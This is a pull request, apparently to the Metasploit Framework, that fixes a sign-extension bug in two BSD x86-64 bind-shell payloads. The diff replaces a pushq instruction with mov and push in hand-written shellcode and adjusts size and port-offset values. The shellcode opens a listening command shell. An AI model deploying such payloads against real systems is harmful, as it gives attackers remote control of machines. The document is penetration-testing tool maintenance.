### PR TITLE
x86-64 pushq signedness error fixed. 

### DIFF
--- a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 89
+  CachedSize = 95
 
   include Msf::Payload::Single
   include Msf::Payload::Bsd
@@ -31,7 +31,7 @@ module Metasploit3
         {
           'Offsets' =>
             {
-              'LPORT'    => [ 20, 'n' ],
+              'LPORT'    => [ 21, 'n' ],
             },
           'Payload' =>
             "\x6a\x61"             +#   pushq  $0x61                       #
@@ -46,7 +46,9 @@ module Metasploit3
             "\x52"                 +#  	push   %rdx                        #
             "\x52"                 +#  	push   %rdx                        #
             "\x52"                 +#  	push   %rdx                        #
-            "\x68\x00\x1c\x11\x5c" +#   pushq  $0x5c111c00                 #
+            "\x48\xba\x00\x1c\x11" +#   mov    0x000000005c110200,         #
+            "\x5c\x00\x00\x00\x00" +#          %rdx                        #
+            "\x52"                 +#   push   %rdx                        #
             "\x48\x89\xe6"         +#   mov    %rsp,%rsi                   #
             "\x6a\x1c"             +#   pushq  $0x1c                       #
             "\x5a"                 +#  	pop    %rdx                        #

--- a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb
+++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 87
+  CachedSize = 93
 
   include Msf::Payload::Single
   include Msf::Payload::Bsd
@@ -31,7 +31,7 @@ module Metasploit3
         {
           'Offsets' =>
             {
-              'LPORT'    => [ 18, 'n' ],
+              'LPORT'    => [ 19, 'n' ],
             },
           'Payload' =>
             "\x6a\x61"             +#	pushq  $0x61                       #
@@ -44,7 +44,9 @@ module Metasploit3
             "\x0f\x05"             +#	syscall                            #
             "\x48\x97"             +#	xchg   %rax,%rdi                   #
             "\x52"                 +#	push   %rdx                        #
-            "\x68\x00\x02\x11\x5c" +#	pushq  $0x5c110200                 #
+            "\x48\xba\x00\x02\x11" +#   mov    0x000000005c110200,         #
+            "\x5c\x00\x00\x00\x00" +#	       %rdx                        #
+            "\x52"                 +#	push   %rdx                        #
             "\x48\x89\xe6"         +#	mov    %rsp,%rsi                   #
             "\x6a\x10"             +#	pushq  $0x10                       #
             "\x5a"                 +#	pop    %rdx                        #


### PR DESCRIPTION
Signed port numbers (2bytes) were not working properly. Fix means +6bytes in shellcode length.
When a port was specified and the lower bytes was bigger then 7f, then the pushq padded the qword with 0xffffffff instead of 0x00000000. The value was modified, the port was not the specified one.
